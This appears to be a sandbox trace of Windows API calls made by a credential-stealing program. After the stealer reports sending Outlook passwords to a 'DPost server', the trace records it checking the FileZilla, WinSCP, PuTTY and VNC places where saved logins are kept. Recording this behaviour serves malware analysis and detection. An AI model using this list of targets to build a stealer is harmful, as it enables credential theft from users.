	[0223.407] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a6b0 | out: hHeap=0x370000) returned 1
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x3e) returned 0x384e10
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x11) returned 0x390638
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc) returned 0x3ac080
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac0f8
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x3ab070
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xf) returned 0x3ac110
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xe) returned 0x3ac128
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x58) returned 0x3ab4a8
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390638 | out: hHeap=0x370000) returned 1
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x58) returned 0x3ab508
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab4a8 | out: hHeap=0x370000) returned 1
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x390638
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xd0) returned 0x39d038
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3a1960
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1e) returned 0x3aa588
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x52) returned 0x3ab4a8
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac140
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3aa560
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac140 | out: hHeap=0x370000) returned 1
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xf) returned 0x3ac140
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1b2) returned 0x3abcd0
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab508 | out: hHeap=0x370000) returned 1
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390638 | out: hHeap=0x370000) returned 1
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39d038 | out: hHeap=0x370000) returned 1
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1960 | out: hHeap=0x370000) returned 1
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa588 | out: hHeap=0x370000) returned 1
	[0223.408] GetProcessHeap () returned 0x370000
	[0223.408] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab4a8 | out: hHeap=0x370000) returned 1
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa560 | out: hHeap=0x370000) returned 1
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac140 | out: hHeap=0x370000) returned 1
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab070 | out: hHeap=0x370000) returned 1
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac0f8 | out: hHeap=0x370000) returned 1
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac110 | out: hHeap=0x370000) returned 1
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac128 | out: hHeap=0x370000) returned 1
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac080 | out: hHeap=0x370000) returned 1
	[0223.409] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.409] send (s=0x17c, buf=0x3abcdc*, len=421, flags=0) returned 421
	[0223.409] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) returned 0x360000
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2c) returned 0x38a6b0
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a6b0 | out: hHeap=0x370000) returned 1
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2e) returned 0x38a6b0
	[0223.409] GetProcessHeap () returned 0x370000
	[0223.409] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a6b0 | out: hHeap=0x370000) returned 1
	[0223.409] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.410] send (s=0x17c, buf=0x360000*, len=230, flags=0) returned 230
	[0223.410] VirtualFree (lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0223.410] GetProcessHeap () returned 0x370000
	[0223.410] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac080
	[0223.410] GetProcessHeap () returned 0x370000
	[0223.410] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x3ab070
	[0223.410] GetProcessHeap () returned 0x370000
	[0223.410] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3ab070, Size=0x100) returned 0x3ab070
	[0223.410] GetProcessHeap () returned 0x370000
	[0223.410] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1000) returned 0x3ac838
	[0223.410] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.410] recv (in: s=0x17c, buf=0x3ac838, len=4096, flags=0 | out: buf=0x3ac838*) returned 139
	[0223.939] GetProcessHeap () returned 0x370000
	[0223.939] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc) returned 0x3ac128
	[0223.939] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x3000, flProtect=0x4) returned 0x360000
	[0223.939] GetProcessHeap () returned 0x370000
	[0223.939] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x91) returned 0x3abe90
	[0223.939] VirtualFree (lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0223.940] GetProcessHeap () returned 0x370000
	[0223.940] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac128 | out: hHeap=0x370000) returned 1
	[0223.940] GetProcessHeap () returned 0x370000
	[0223.940] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab070 | out: hHeap=0x370000) returned 1
	[0223.940] GetProcessHeap () returned 0x370000
	[0223.940] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac080 | out: hHeap=0x370000) returned 1
	[0223.940] GetProcessHeap () returned 0x370000
	[0223.940] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac080
	[0223.940] GetProcessHeap () returned 0x370000
	[0223.940] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x3ab070
	[0223.940] GetProcessHeap () returned 0x370000
	[0223.940] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3ab070, Size=0x100) returned 0x3ab070
	[0223.940] GetProcessHeap () returned 0x370000
	[0223.940] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc) returned 0x3ac128
	[0223.940] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x360000
	[0223.941] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.941] recv (in: s=0x17c, buf=0x3ac838, len=4096, flags=0 | out: buf=0x3ac838) returned 0
	[0223.941] GetProcessHeap () returned 0x370000
	[0223.941] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac110
	[0223.941] VirtualFree (lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0223.941] GetProcessHeap () returned 0x370000
	[0223.941] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac128 | out: hHeap=0x370000) returned 1
	[0223.941] GetProcessHeap () returned 0x370000
	[0223.941] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab070 | out: hHeap=0x370000) returned 1
	[0223.941] GetProcessHeap () returned 0x370000
	[0223.941] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac080 | out: hHeap=0x370000) returned 1
	[0223.941] GetProcessHeap () returned 0x370000
	[0223.941] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac838 | out: hHeap=0x370000) returned 1
	[0223.941] GetProcessHeap () returned 0x370000
	[0223.941] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x91) returned 0x3ab070
	[0223.941] GetProcessHeap () returned 0x370000
	[0223.941] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc) returned 0x3ac080
	[0223.941] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac128
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x3ab110
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xf) returned 0x3ac0f8
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xe) returned 0x3ac140
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab110 | out: hHeap=0x370000) returned 1
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1c) returned 0x3aa560
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac158
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1e) returned 0x3aa588
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1b) returned 0x3aa538
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a6b0
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1e) returned 0x3aa290
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3ac158, Size=0x20) returned 0x3aa470
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x25) returned 0x39e620
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x15) returned 0x390638
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac158
	[0223.942] GetProcessHeap () returned 0x370000
	[0223.942] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac158 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xf) returned 0x3ac158
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x12) returned 0x3906d8
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x17) returned 0x3906f8
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa560 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa588 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa538 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a6b0 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa290 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e620 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa470 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac128 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac0f8 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac140 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac080 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3abe90 | out: hHeap=0x370000) returned 1
	[0223.943] GetProcessHeap () returned 0x370000
	[0223.943] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3abcd0 | out: hHeap=0x370000) returned 1
	[0223.944] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.944] closesocket (s=0x17c) returned 0
	[0223.944] GetProcessHeap () returned 0x370000
	[0223.944] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1b90 | out: hHeap=0x370000) returned 1
	[0223.944] GetProcessHeap () returned 0x370000
	[0223.944] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3949b0 | out: hHeap=0x370000) returned 1
	[0223.944] GetProcessHeap () returned 0x370000
	[0223.945] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac0c8 | out: hHeap=0x370000) returned 1
	[0223.945] GetProcessHeap () returned 0x370000
	[0223.945] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac0b0 | out: hHeap=0x370000) returned 1
	[0223.945] GetProcessHeap () returned 0x370000
	[0223.945] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aafa0 | out: hHeap=0x370000) returned 1
	[0223.945] GetProcessHeap () returned 0x370000
	[0223.945] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x386500 | out: hHeap=0x370000) returned 1
	[0223.945] GetProcessHeap () returned 0x370000
	[0223.945] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3905d8 | out: hHeap=0x370000) returned 1
	[0223.945] GetProcessHeap () returned 0x370000
	[0223.945] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3863c0 | out: hHeap=0x370000) returned 1
	[0223.945] GetProcessHeap () returned 0x370000
	[0223.945] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390618 | out: hHeap=0x370000) returned 1
	[0223.945] VirtualFree (lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0223.945] GetProcessHeap () returned 0x370000
	[0223.945] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e5c0 | out: hHeap=0x370000) returned 1
	[0223.945] GetProcessHeap () returned 0x370000
	[0223.945] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3905f8 | out: hHeap=0x370000) returned 1
	[0223.945] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0223.946] GetProcessHeap () returned 0x370000
	[0223.946] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e650 | out: hHeap=0x370000) returned 1
	[0223.946] GetProcessHeap () returned 0x370000
	[0223.946] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39a158 | out: hHeap=0x370000) returned 1
	[0223.946] GetProcessHeap () returned 0x370000
	[0223.946] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39bc60 | out: hHeap=0x370000) returned 1
	[0223.946] GetProcessHeap () returned 0x370000
	[0223.946] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e530 | out: hHeap=0x370000) returned 1
	[0223.946] GetProcessHeap () returned 0x370000
	[0223.946] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39bb88 | out: hHeap=0x370000) returned 1
	[0223.946] GetProcessHeap () returned 0x370000
	[0223.946] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab448 | out: hHeap=0x370000) returned 1
	[0223.946] lstrlenA (lpString="Outlook passwords") returned 17
	[0223.946] wsprintfA (in: param_1=0x39b650, param_2="Successfully sent PASSWORDS to DPost server: %s" | out: param_1="Successfully sent PASSWORDS to DPost server: Outlook passwords") returned 62
	[0223.946] ResetEvent (hEvent=0xc) returned 1
	[0223.946] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0223.948] GetProcessHeap () returned 0x370000
	[0223.948] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390538 | out: hHeap=0x370000) returned 1
	[0223.948] GetProcessHeap () returned 0x370000
	[0223.949] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3905b8 | out: hHeap=0x370000) returned 1
	[0223.949] GetProcessHeap () returned 0x370000
	[0223.949] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e560 | out: hHeap=0x370000) returned 1
	[0223.949] Sleep (dwMilliseconds=0x7530) 
	[0234.453] GetProcessHeap () returned 0x370000
	[0234.453] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b650 | out: hHeap=0x370000) returned 1
	[0234.453] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1898 | out: hHeap=0x370000) returned 1
	[0234.454] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a720
	[0234.454] ExpandEnvironmentStringsA (in: lpSrc="%APPDATA%\\filezilla\\recentservers.xml", lpDst=0x16e77c4, nSize=0x8000 | out: lpDst="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\filezilla\\recentservers.xml") returned 0x42
	[0234.455] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x50) returned 0x3949b0
	[0234.455] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a720 | out: hHeap=0x370000) returned 1
	[0234.455] GetFileAttributesA (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\filezilla\\recentservers.xml" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\filezilla\\recentservers.xml")) returned 0xffffffff
	[0234.455] ResetEvent (hEvent=0xc) returned 1
	[0234.456] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0234.457] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a720
	[0234.457] ExpandEnvironmentStringsA (in: lpSrc="%APPDATA%\\filezilla\\sitemanager.xml", lpDst=0x16e77c4, nSize=0x8000 | out: lpDst="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\filezilla\\sitemanager.xml") returned 0x40
	[0234.457] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x384a68
	[0234.457] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a720 | out: hHeap=0x370000) returned 1
	[0234.457] GetFileAttributesA (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\filezilla\\sitemanager.xml" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\filezilla\\sitemanager.xml")) returned 0xffffffff
	[0234.458] ResetEvent (hEvent=0xc) returned 1
	[0234.458] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0234.470] ResetEvent (hEvent=0xc) returned 1
	[0234.470] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0234.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384a68 | out: hHeap=0x370000) returned 1
	[0234.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3949b0 | out: hHeap=0x370000) returned 1
	[0234.486] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a720
	[0234.486] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl\\WinSCP 2\\Sessions\\", phkResult=0x16ef9a4 | out: phkResult=0x16ef9a4*=0x0) returned 0x2
	[0234.486] ResetEvent (hEvent=0xc) returned 1
	[0234.486] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0234.502] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a720 | out: hHeap=0x370000) returned 1
	[0234.502] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a720
	[0234.502] ExpandEnvironmentStringsA (in: lpSrc="%APPDATA%\\Microsoft\\Windows\\Recent\\", lpDst=0x16e7778, nSize=0x8000 | out: lpDst="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 0x40
	[0234.502] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x384a68
	[0234.502] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a720 | out: hHeap=0x370000) returned 1
	[0234.502] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x50) returned 0x3949b0
	[0234.502] FindFirstFileA (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.vnc.lnk", lpFindFileData=0x16ef798 | out: lpFindFileData=0x16ef798*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x3949b0, ftCreationTime.dwHighDateTime=0x16ef7b4, ftLastAccessTime.dwLowDateTime=0x1008fe49, ftLastAccessTime.dwHighDateTime=0x370000, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x3949b0, nFileSizeHigh=0x16ef7c0, nFileSizeLow=0x1000ef7e, dwReserved0=0x3949b0, dwReserved1=0x16efadc, cFileName="\xd4\xe3", cAlternateFileName="ook passwords")) returned 0xffffffff
	[0234.503] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3949b0 | out: hHeap=0x370000) returned 1
	[0234.503] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384a68 | out: hHeap=0x370000) returned 1
	[0234.503] ResetEvent (hEvent=0xc) returned 1
	[0234.503] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0234.549] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x390578
	[0234.549] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a720
	[0234.549] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390578 | out: hHeap=0x370000) returned 1
	[0234.549] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x48) returned 0x3863c0
	[0234.549] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a720 | out: hHeap=0x370000) returned 1
	[0234.549] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x3ab110
	[0234.549] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3863c0 | out: hHeap=0x370000) returned 1
	[0234.549] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x90) returned 0x399328
	[0234.549] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab110 | out: hHeap=0x370000) returned 1
	[0234.549] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x390578
	[0234.549] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a720
	[0234.549] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390578 | out: hHeap=0x370000) returned 1
	[0234.549] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x48) returned 0x3863c0
	[0234.549] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a720 | out: hHeap=0x370000) returned 1
	[0234.549] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x3ab110
	[0234.549] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3863c0 | out: hHeap=0x370000) returned 1
	[0234.549] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x90) returned 0x39b650
	[0234.550] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab110 | out: hHeap=0x370000) returned 1
	[0234.550] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xd8) returned 0x39a050
	[0234.550] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b650 | out: hHeap=0x370000) returned 1
	[0234.550] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3a1898
	[0234.550] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a720
	[0234.550] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1898 | out: hHeap=0x370000) returned 1
	[0234.550] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0234.550] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ef864 | out: phkResult=0x16ef864*=0x0) returned 0x2
	[0234.550] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a720 | out: hHeap=0x370000) returned 1
	[0234.550] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39a050 | out: hHeap=0x370000) returned 1
	[0234.550] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399328 | out: hHeap=0x370000) returned 1
	[0234.550] ResetEvent (hEvent=0xc) returned 1
	[0234.550] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
